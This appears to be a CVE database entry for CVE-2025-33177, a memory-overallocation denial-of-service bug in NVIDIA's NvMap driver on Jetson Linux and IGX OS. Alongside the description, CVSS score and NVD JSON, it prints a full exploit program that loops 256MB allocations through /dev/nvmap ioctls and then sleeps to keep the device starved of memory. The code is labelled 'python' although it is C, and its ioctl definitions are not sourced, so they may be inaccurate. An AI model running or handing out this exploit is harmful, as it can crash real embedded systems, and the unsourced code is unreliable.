CVE-2025-33177

Description

NVIDIA Jetson Linux and IGX OS contain a vulnerability in NvMap, where improper tracking of memory allocations could allow a local attacker to cause memory overallocation. A successful exploitation of this vulnerability might lead to denial of service.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

NVIDIA Jetson Linux 所有受影响版本（详见NVIDIA安全公告a_id/5716）

NVIDIA IGX OS 所有受影响版本（详见NVIDIA安全公告a_id/5716）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-33177 PoC - NvMap Memory Overallocation DoS
// Target: NVIDIA Jetson Linux / IGX OS - NvMap driver
// Vulnerability: Improper tracking of memory allocations in NvMap

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>

// NvMap ioctl definitions (from kernel headers)
#define NVMAP_IOC_MAGIC 'N'

// NvMap handle allocation structure
struct nvmap_allocate_params {
    unsigned int handle;
    unsigned int heap_mask;
    unsigned int flags;
    unsigned int align;
    unsigned long size;
};

// NvMap create handle structure
struct nvmap_create_handle_params {
    unsigned int handle;
    unsigned int size;
    unsigned int flags;
};

#define NVMAP_IOCTL_CREATE_HANDLE _IOWR(NVMAP_IOC_MAGIC, 0x00, struct nvmap_create_handle_params)
#define NVMAP_IOCTL_ALLOC_HANDLE  _IOWR(NVMAP_IOC_MAGIC, 0x01, struct nvmap_allocate_params)
#define NVMAP_IOCTL_FREE_HANDLE   _IOWR(NVMAP_IOC_MAGIC, 0x02, unsigned int)
#define NVMAP_IOCTL_MMAP          _IOWR(NVMAP_IOC_MAGIC, 0x03, unsigned int)

#define NVMAP_HEAP_IOVMM    (1ul << 2)
#define NVMAP_HANDLE_WRITE  (1 << 0)
#define NVMAP_HANDLE_READ   (1 << 1)

int main(int argc, char *argv[]) {
    int fd;
    int ret;
    unsigned int handles[1024];
    int num_handles = 0;
    unsigned long alloc_size = 256 * 1024 * 1024; // 256MB per allocation

    // Open the NvMap device
    fd = open("/dev/nvmap", O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("[-] Failed to open /dev/nvmap");
        return 1;
    }
    printf("[+] Opened /dev/nvmap successfully (fd=%d)\n", fd);

    // Exploit: Repeatedly allocate memory without proper tracking
    // The vulnerability allows overallocation due to improper tracking
    printf("[*] Starting memory overallocation exploit...\n");

    for (int i = 0; i < 1024; i++) {
        struct nvmap_create_handle_params create_params;
        struct nvmap_allocate_params alloc_params;

        memset(&create_params, 0, sizeof(create_params));
        memset(&alloc_params, 0, sizeof(alloc_params));

        // Step 1: Create a NvMap handle
        create_params.size = alloc_size;
        create_params.flags = NVMAP_HANDLE_READ | NVMAP_HANDLE_WRITE;

        ret = ioctl(fd, NVMAP_IOCTL_CREATE_HANDLE, &create_params);
        if (ret < 0) {
            printf("[-] Failed to create handle at iteration %d: %s\n", i, strerror(errno));
            break;
        }
        handles[num_handles] = create_params.handle;
        num_handles++;

        // Step 2: Allocate memory for the handle
        alloc_params.handle = create_params.handle;
        alloc_params.heap_mask = NVMAP_HEAP_IOVMM;
        alloc_params.flags = NVMAP_HANDLE_READ | NVMAP_HANDLE_WRITE;
        alloc_params.align = 4096;
        alloc_params.size = alloc_size;

        ret = ioctl(fd, NVMAP_IOCTL_ALLOC_HANDLE, &alloc_params);
        if (ret < 0) {
            printf("[-] Failed to allocate at iteration %d: %s\n", i, strerror(errno));
            // Free the handle if allocation failed
            ioctl(fd, NVMAP_IOCTL_FREE_HANDLE, &create_params.handle);
            break;
        }

        printf("[+] Iteration %d: Allocated handle=%u size=%lu MB (total: %d handles)\n",
               i, create_params.handle, alloc_size / (1024*1024), num_handles);
    }

    printf("[+] Exploit complete. %d handles allocated.\n", num_handles);
    printf("[*] System should experience memory pressure / DoS\n");

    // Keep handles alive to maintain memory pressure
    printf("[*] Sleeping to maintain memory pressure...\n");
    sleep(3600);

    // Cleanup (may not be reached if system crashes)
    for (int i = 0; i < num_handles; i++) {
        ioctl(fd, NVMAP_IOCTL_FREE_HANDLE, &handles[i]);
    }
    close(fd);

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33177
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33177
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33177/
[4] VulDB https://vuldb.com/cve/CVE-2025-33177
[5] https://nvidia.custhelp.com/app/answers/detail/a_id/5716

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33177", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:33.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Jetson Linux and IGX OS contain a vulnerability in NvMap, where improper tracking of memory allocations could allow a local attacker to cause memory overallocation. A successful exploitation of this vulnerability might lead to denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5716", "source": "[email protected]"}]}}